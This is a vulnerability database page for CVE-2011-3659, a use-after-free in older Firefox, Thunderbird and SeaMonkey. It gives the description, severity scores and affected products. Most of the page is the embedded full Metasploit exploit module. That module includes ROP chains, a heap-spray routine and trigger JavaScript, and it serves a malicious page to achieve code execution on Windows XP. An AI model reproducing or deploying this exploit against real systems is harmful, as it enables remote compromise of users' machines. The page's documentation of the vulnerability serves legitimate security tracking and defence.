CVE-2011-3659 : Detail

CVE-2011-3659

Memory Corruption
93.6%V3
Network
2012-02-01
15h00 +00:00
2017-09-18
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Use-after-free vulnerability in Mozilla Firefox before 3.6.26 and 4.x through 9.0, Thunderbird before 3.1.18 and 5.0 through 9.0, and SeaMonkey before 2.7 might allow remote attackers to execute arbitrary code via vectors related to incorrect AttributeChildRemoved notifications that affect access to removed nsDOMAttribute child nodes.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-416 Use After Free
The product reuses or references memory after it has been freed. At some point afterward, the memory may be allocated again and saved in another pointer, while the original pointer references a location somewhere within the new allocation. Any operations using the original pointer are no longer valid because the memory "belongs" to the code that operates on the new pointer.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 18870

Publication date : 2012-05-12 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Firefox 8/9 AttributeChildRemoved() Use-After-Free', 'Description' => %q{ This module exploits a use-after-free vulnerability in Firefox 8/8.0.1 and 9/9.0.1. Removal of child nodes from the nsDOMAttribute can allow for a child to still be accessible after removal due to a premature notification of AttributeChildRemoved. Since mFirstChild is not set to NULL until after this call is made, this means the removed child will be accessible after it has been removed. By carefully manipulating the memory layout, this can lead to arbitrary code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'regenrecht', #vulnerability discovery 'Lincoln<lincoln[at]corelan.be>', #Metasploit module 'corelanc0d3r<peter.ve[at]corelan.be>' #Metasploit module ], 'References' => [ [ 'CVE', '2011-3659' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/upcoming/'], #ZDI-CAN-1413 [ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=708198' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f' }, 'Payload' => { 'BadChars' => "\x00\x0a\x0d\x34", 'DisableNops' => true, 'PrependEncoder' => "\x81\xc4\x24\xfa\xff\xff" #ADD ESP, -5DC }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'Windows XP - Firefox 8 / 8.0.1', { 'Ret' => 0x0C0C0C0C, 'OffSet' => 0x606, 'Size' => 0x40000, 'StackFlip' => 0x7818f50b, # XCHG EAX,ESP # POP EBP # POP EBX # RETN [MOZCRT19.dll] 'PopEsp' => [ 0x0c0c0c0c, 0x0c0c0c0c, 0x7819548e, 0x0c0c0c10 ], 'FF' => 8, 'OS' => 'XP' } ], [ 'Windows XP - Firefox 9', { 'Ret' => 0x0C0C0C0C, 'OffSet' => 0x606, 'Size' => 0x40000, 'StackFlip' => 0x1000ed58, # XCHG EAX,ESP # ... # POP ESI # RETN [nspr4.dll] 'PopEsp' => [ 0x0c0c0c0c, 0x10006a01, 0x0c0c0c10 ], # POP ESP # RETN [nspr4.dll] 'FF' => 9, 'OS' => 'XP' } ], [ 'Windows XP - Firefox 9.0.1', { 'Ret' => 0x0C0C0C0C, 'OffSet' => 0x606, 'Size' => 0x40000, 'StackFlip' => 0x1000ed4a, # XCHG EAX,ESP # ... # POP ESI # RETN [nspr4.dll] 'PopEsp' => [ 0x0c0c0c0c, 0x10006a11, 0x0c0c0c10 ], # POP ESP # RETN [nspr4.dll] 'FF' => 901, 'OS' => 'XP' } ] ], 'DisclosureDate' => 'Dec 6 2011', 'DefaultTarget' => 0)) end def autofilter false end def check_dependencies use_zlib end def junk(n=4) return rand_text_alpha_upper(n).unpack("L")[0].to_i end def nop return make_nops(4).unpack("L")[0].to_i end def get_rop_chain(ffversion,osversion) # mona.py ROP chains rop_chain = [] if ffversion == 8 and osversion == "XP" rop_chain = [ 0x7819c80a, # POP EAX # RETN [MOZCRT19.dll] 0x781a909c, # ptr to &VirtualAlloc() [IAT MOZCRT19.dll] 0x7813af5d, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MOZCRT19.dll] 0x78197f06, # XCHG EAX,ESI # RETN [MOZCRT19.dll] 0x7814eef1, # POP EBP # RETN [MOZCRT19.dll] 0x781503c3, # & call esp [MOZCRT19.dll] 0x781391d0, # POP EBX # RETN [MOZCRT19.dll] 0x00000001, # 0x00000001-> ebx 0x781a147c, # POP EDX # RETN [MOZCRT19.dll] 0x00001000, # 0x00001000-> edx 0x7819728e, # POP ECX # RETN [MOZCRT19.dll] 0x00000040, # 0x00000040-> ecx 0x781945b5, # POP EDI # RETN [MOZCRT19.dll] 0x78152809, # RETN (ROP NOP) [MOZCRT19.dll] 0x7819ce58, # POP EAX # RETN [MOZCRT19.dll] nop, # nop 0x7813d6b7, # PUSHAD # RETN [MOZCRT19.dll] ].flatten.pack("V*") elsif ffversion == 9 and osversion == "XP" rop_chain = [ 0x10019ee9, # POP ECX # RETN [nspr4.dll] 0x10020060, # ptr to &LoadLibraryW() [IAT nspr4.dll] 0x1000f994, # MOV EAX,DWORD PTR DS:[ECX] # RETN [nspr4.dll] 0x10012ad0, # POP EBX # RETN [nspr4.dll] 0x00000000, # clear ebx 0x10006f41, # ADD EBX,EAX # XOR EAX,EAX # RETN 0x1000cf40, # POP EDX # RETN 00 [nspr4.dll] 0x1000d6ce, # RETN (ROP NOP) [nspr4.dll] 0x10019ee9, # POP ECX # RETN [nspr4.dll] 0x0c0c0c50, # xul.dll (Unicode string) 0x1000eeb4, # POP EDI # RETN [nspr4.dll] 0x1001f145, # ADD ESP,0C # RETN [nspr4.dll] - call LoadLibrary 0x10004860, # POP EAX # RETN [nspr4.dll] 0x1001f111, # ADD ESP,10 # POP ESI # RETN [nspr4.dll] 0x100058B3, # PUSHAD # CALL EAX [nspr4.dll] junk, # win some, lose some 0x00750078, # xu 0x002e006c, # l. 0x006c0064, # dl 0x0000006c, # l 0x1000cf40, # POP EDX # RETN 00 [nspr4.dll] 0x00A63374, # Delta to IAT VirtualAlloc() 0x10018ada, # ADD EAX,EDX # RETN [nspr4.dll] 0x10008ddf, # MOV EAX,DWORD PTR DS:[EAX] # RETN ** [nspr4.dll] 0x1000a031, # POP ESI # RETN ** [nspr4.dll] 0x1000a031, # POP ESI # RETN ** [nspr4.dll] (readable address) 0x10013f1f, # XCHG EAX,ESI # ADD DL,BYTE PTR DS:[EAX] # RETN [nspr4.dll] 0x1000687b, # POP EBP # RETN [nspr4.dll] 0x1001a59b, # & call esp [nspr4.dll] 0x10012ad0, # POP EBX # RETN [nspr4.dll] 0x00000001, # 0x00000001-> ebx 0x1000cf40, # POP EDX # RETN 00 [nspr4.dll] 0x00001000, # 0x00001000-> edx 0x1001069e, # POP ECX # RETN [nspr4.dll] 0x00000040, # 0x00000040-> ecx 0x1000eeb4, # POP EDI # RETN [nspr4.dll] 0x1000d6ce, # RETN (ROP NOP) [nspr4.dll] 0x10004860, # POP EAX # RETN [nspr4.dll] 0x10004860, # POP EAX # RETN [nspr4.dll] 0x100058B3, # PUSHAD # CALL EAX [nspr4.dll] ].flatten.pack("V*") elsif ffversion == 901 and osversion == "XP" rop_chain = [ 0x1000bfc1, # POP ECX # RETN [nspr4.dll] 0x10020060, # ptr to &LoadLibraryW() [IAT nspr4.dll] 0x1000f986, # MOV EAX,DWORD PTR DS:[ECX] # RETN [nspr4.dll] 0x1000f5ef, # POP EBX # RETN [nspr4.dll] 0x00000000, # clear ebx 0x10006f51, # ADD EBX,EAX # XOR EAX,EAX # RETN 0x1000cf2c, # POP EDX # RETN 00 [nspr4.dll] 0x1001ea03, # RETN (ROP NOP) [nspr4.dll] 0x1000bfc1, # POP ECX # RETN [nspr4.dll] 0x0c0c0c50, # xul.dll (Unicode string) 0x1000eea6, # POP EDI # RETN [nspr4.dll] 0x1000dda4, # ADD ESP,0C # RETN [nspr4.dll] - call LoadLibrary 0x10004870, # POP EAX # RETN [nspr4.dll] 0x10001ab4, # ADD ESP,10 # POP ESI # RETN [nspr4.dll] 0x100058c3, # PUSHAD # CALL EAX [nspr4.dll] junk, # win some, lose some 0x00750078, # xu 0x002e006c, # l. 0x006c0064, # dl 0x0000006c, # l 0x1000cf2c, # POP EDX # RETN 00 [nspr4.dll] 0x00A63374, # Delta to IAT VirtualAlloc() 0x10018acf, # ADD EAX,EDX # RETN [nspr4.dll] 0x10008dd1, # MOV EAX,DWORD PTR DS:[EAX] # RETN ** [nspr4.dll] 0x1000e0b8, # POP ESI # RETN ** [nspr4.dll] 0x1000e0b8, # POP ESI # RETN ** [nspr4.dll] (readable address) 0x10013f14, # XCHG EAX,ESI # ADD DL,BYTE PTR DS:[EAX] # RETN [nspr4.dll] 0x100162d5, # POP EBP # RETN [nspr4.dll] 0x10019d12, # & push esp # ret [nspr4.dll] 0x1000f5ef, # POP EBX # RETN [nspr4.dll] 0x00000001, # 0x00000001-> ebx 0x1000cf2c, # POP EDX # RETN 00 [nspr4.dll] 0x00001000, # 0x00001000-> edx 0x10007e46, # POP ECX # RETN [nspr4.dll] 0x00000040, # 0x00000040-> ecx 0x1000eea6, # POP EDI # RETN [nspr4.dll] 0x1001ea03, # RETN (ROP NOP) [nspr4.dll] 0x10004870, # POP EAX # RETN [nspr4.dll] 0x10004870, # POP EAX # RETN [nspr4.dll] 0x100058c3, # PUSHAD # CALL EAX [nspr4.dll] ].flatten.pack("V*") end return rop_chain end def on_request_uri(cli, request) # Re-generate the payload. return if ((p = regenerate_payload(cli)) == nil) # determine the target FF and OS version ffversion = "" osversion = "" agent = request.headers['User-Agent'] if agent !~ /Firefox\/8\.0/ and agent !~ /Firefox\/9\.0/ vprint_error("This browser version is not supported: #{agent.to_s}") send_not_found(cli) return end my_target = target if my_target.name == 'Automatic' if agent =~ /NT 5\.1/ and agent =~ /Firefox\/8/ my_target = targets[1] elsif agent =~ /NT 5\.1/ and agent =~ /Firefox\/9\.0\.1/ my_target = targets[3] elsif agent =~ /NT 5\.1/ and agent =~ /Firefox\/9\.0/ my_target = targets[2] elsif vprint_error("This Operating System is not supported: #{agent.to_s}") send_not_found(cli) return end target = my_target end # Create the payload print_status("Creating payload for #{target.name}") rop = [ target['StackFlip'] ].pack("V") rop << get_rop_chain(target['FF'],target['OS']) rop_js = Rex::Text.to_unescape(rop, Rex::Arch.endian(target.arch)) code = payload.encoded code_js = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch)) popesp = target['PopEsp'].flatten.pack("V*") popesp_js = Rex::Text.to_unescape(popesp, Rex::Arch.endian(target.arch)) filler = [ junk ].pack("V*") filler_js = Rex::Text.to_unescape(filler, Rex::Arch.endian(target.arch)) # random JavaScript variable names i_name = rand_text_alpha(rand(10) + 5) rop_name = rand_text_alpha(rand(10) + 5) code_name = rand_text_alpha(rand(10) + 5) offset_length_name = rand_text_alpha(rand(10) + 5) randnum1_name = rand_text_alpha(rand(10) + 5) randnum2_name = rand_text_alpha(rand(10) + 5) randnum3_name = rand_text_alpha(rand(10) + 5) randnum4_name = rand_text_alpha(rand(10) + 5) paddingstr_name = rand_text_alpha(rand(10) + 5) padding_name = rand_text_alpha(rand(10) + 5) junk_offset_name = rand_text_alpha(rand(10) + 5) single_sprayblock_name = rand_text_alpha(rand(10) + 5) sprayblock_name = rand_text_alpha(rand(10) + 5) varname_name = rand_text_alpha(rand(10) + 5) thisvarname_name = rand_text_alpha(rand(10) + 5) attr_name = rand_text_alpha(rand(10) + 5) foo_name = rand_text_alpha(rand(10) + 5) bar_name = rand_text_alpha(rand(10) + 5) ni_name = rand_text_alpha(rand(10) + 5) small_name = rand_text_alpha(rand(10) + 5) addr_name = rand_text_alpha(rand(10) + 5) run_name = rand_text_alpha(rand(10) + 5) container_name = rand_text_alpha(rand(10) + 5) # corelan precise heap spray: # https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/ # + trigger routine spray = <<-JS var #{rop_name} = unescape("#{rop_js}"); var #{code_name} = unescape("#{code_js}"); var #{offset_length_name} = #{target['OffSet']}; for (var #{i_name}=0; #{i_name} < 0x320; #{i_name}++) { var #{randnum1_name}=Math.floor(Math.random()*90)+10; var #{randnum2_name}=Math.floor(Math.random()*90)+10; var #{randnum3_name}=Math.floor(Math.random()*90)+10; var #{randnum4_name}=Math.floor(Math.random()*90)+10; var #{paddingstr_name} = "%u" + #{randnum1_name}.toString() + #{randnum2_name}.toString(); #{paddingstr_name} += "%u" + #{randnum3_name}.toString() + #{randnum4_name}.toString(); var #{padding_name} = unescape(#{paddingstr_name}); while (#{padding_name}.length < 0x1000) #{padding_name}+= #{padding_name}; #{junk_offset_name} = #{padding_name}.substring(0, #{offset_length_name}); var #{single_sprayblock_name} = #{junk_offset_name} + #{rop_name} + #{code_name}; #{single_sprayblock_name} += #{padding_name}.substring(0,0x800 - #{offset_length_name} - #{rop_name}.length - #{code_name}.length); while (#{single_sprayblock_name}.length < #{target['Size']}) #{single_sprayblock_name} += #{single_sprayblock_name}; #{sprayblock_name} = #{single_sprayblock_name}.substring(0, (#{target['Size']}-6)/2); #{varname_name} = "var" + #{randnum1_name}.toString() + #{randnum2_name}.toString(); #{varname_name} += #{randnum3_name}.toString() + #{randnum4_name}.toString() + #{i_name}.toString(); #{thisvarname_name} = "var " + #{varname_name} + "= '" + #{sprayblock_name} +"';"; eval(#{thisvarname_name}); } function #{run_name}() { var #{attr_name} = document.createAttribute("#{foo_name}"); #{attr_name}.value = "#{bar_name}"; var #{ni_name} = document.createNodeIterator( #{attr_name}, NodeFilter.SHOW_ALL, {acceptNode: function(node) { return NodeFilter.FILTER_ACCEPT; }}, false); #{ni_name}.nextNode(); #{ni_name}.nextNode(); #{ni_name}.previousNode(); #{attr_name}.value = null; const #{addr_name} = unescape("#{filler_js}"); var #{container_name} = new Array(); var #{small_name} = unescape("#{popesp_js}") while (#{small_name}.length != 30) #{small_name} += #{addr_name}; for (#{i_name} = 0; #{i_name} < 1024*1024*2; ++#{i_name}) #{container_name}.push(unescape(#{small_name})); #{ni_name}.referenceNode; } JS # build html content = <<-HTML <html> <head> <meta http-equiv="refresh" content="3"> <body> <script language='javascript'> #{spray} </script> </head> <body onload="#{run_name}();"> </svg> </body> </html> HTML print_status("Returning HTML") # Transmit the response to the client send_response(cli, content, {'Content-Type'=>'text/html'}) end end

Products Mentioned

Configuraton 0

Mozilla>>Firefox >> Version To (excluding) 3.6.26

Mozilla>>Firefox >> Version From (including) 4.0 To (excluding) 10.0

Mozilla>>Seamonkey >> Version To (excluding) 2.7

Mozilla>>Thunderbird >> Version To (excluding) 3.1.18

Mozilla>>Thunderbird >> Version From (including) 5.0 To (excluding) 10.0

Configuraton 0

Opensuse>>Opensuse >> Version 11.4

Suse>>Linux_enterprise_desktop >> Version 10

Suse>>Linux_enterprise_desktop >> Version 11

Suse>>Linux_enterprise_server >> Version 10

Suse>>Linux_enterprise_server >> Version 11

Suse>>Linux_enterprise_server >> Version 11

Suse>>Linux_enterprise_software_development_kit >> Version 10

Suse>>Linux_enterprise_software_development_kit >> Version 11

References

http://www.mandriva.com/security/advisories?name=MDVSA-2012:013
Tags : vendor-advisory, x_refsource_MANDRIVA